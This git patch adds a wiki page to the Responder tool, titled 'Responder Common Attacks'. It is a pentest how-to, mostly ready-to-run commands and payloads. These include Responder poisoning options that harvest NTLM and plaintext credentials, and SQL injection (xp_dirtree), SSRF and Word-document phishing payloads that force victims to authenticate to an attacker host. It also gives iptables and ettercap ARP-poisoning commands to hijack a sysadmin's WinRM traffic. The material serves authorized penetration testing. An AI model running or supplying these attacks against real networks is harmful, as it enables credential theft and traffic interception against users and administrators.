From 4cbb264a0e64d1fb346f32284e3d6be8d85456c8 Mon Sep 17 00:00:00 2001 From: lgandx Date: Wed, 21 Apr 2021 16:31:32 -0300 Subject: [PATCH] Created Responder Common Attacks (markdown) --- Responder-Common-Attacks.md | 92 +++++++++++++++++++++++++++++++++++++ 1 file changed, 92 insertions(+) create mode 100644 Responder-Common-Attacks.md diff --git a/Responder-Common-Attacks.md b/Responder-Common-Attacks.md new file mode 100644 index 0000000..a497e3f --- /dev/null +++ b/Responder-Common-Attacks.md @@ -0,0 +1,92 @@ +# Responder Common Attacks: + +## Basic usage: + +Redirect workstations to Responder HTTP authentication server and grab NTLM credentials: +>./Responder.py -I wlp2s0 -r**F** + +Redirect workstations to Responder HTTP authentication server and grab plaintext credentials (this sends a login popup on the victim's workstation): +>./Responder.py -I wlp2s0 -r**b** + +Redirect workstations to Responder HTTP Proxy authentication server and grab NTLM credentials: +>./Responder.py -I wlp2s0 -r**P** + +Redirect workstations to Responder HTTP Proxy authentication server and grab plaintext credentials (this sends a login popup on the victim's workstation): +>./Responder.py -I wlp2s0 -r**Pb** + +Redirect workstations to Responder HTTP WPAD proxy and intercept web traffic (Responder will also inject a SMB UNC path to grab credentials transparently): +>./Responder.py -I wlp2s0 -r**w** + +Redirect workstations to Responder HTTP WPAD proxy, intercept web traffic and force NTLM authentication: +>./Responder.py -I wlp2s0 -r**wF** + +Redirect workstations to an other IP instead of Responder's one: +>./Responder.py -I wlp2s0 -r**e** 10.0.0.234 + +## More Advanced attacks + +Responder can be used as a poisoner but can also be used as rogue servers when combining with other attacks, these attacks will be documented below. + +### External Pentest +Responder can be used on an external pentest in the following situation: + +* XXE: + +Set your XXE payload this way: + +` ]>` + + +Watch for any HTTP hashes coming in on your Responder shell. + +Another way would be to set a UNC path instead (less reliable since outbound SMB is often blocked): + +` ]>` + +* MSSQL SQLi: + +SQL Injection on MSSQL can lead to NTLMv1/2 hash grab: + +`xp_dirtree "\\RESPONDER-IP\share";` + +`xp_fileexist '\\RESPONDER-IP\file';` + + +* SSRF: + +Point your SSRF payload to Responder: + +`http://Responder-External-IP/123.html` + +* Phising: + +Create a word document and open it: + +`Hit CTRL + F9 -> IMPORT "\\\\Responder-IP\\123.jpg" -> right click and select "Edit Field" -> tick "Data not stored in document" -> save & close.` + +When the victim opens the document, an SMB request will be issued to Responder-IP. + +### Internal Pentest + +Responder can be used as a rogue authentication server toolkit when combined with ARP poisoning. + +Let's take the example where you know that a sysadmin workstation is located at IP: 192.168.0.153 and you know that this sysadmin is using WinRM to administer servers remotely. + +Sysadmin workstation: + +192.168.0.153 + +Switch IP: + +192.168.0.254 + +Let's set an ARP Prerouting attack, and redirect the sysadmin workstation to our rogue WinRM server: + +//Block ICMP to prevent outgoing ICMP +> iptables -A OUTPUT -p ICMP -j DROP + +//Rewrite IP header destination with your IP instead of the original one for all packets going to TCP 5986 +> iptables -t nat -A PREROUTING -p tcp --dport 5986 -j DNAT --to-destination YOUR-IP:5986 + +//Enable IP Forward to avoid disruption and launch a targeted ARP attack against 192.168.0.153 +>echo 1 > /proc/sys/net/ipv4/ip_forward&&ettercap -T -q -w dump-session.pcap -p -M arp:remote /192.168.0.254// /192.168.0.153// \ No newline at end of file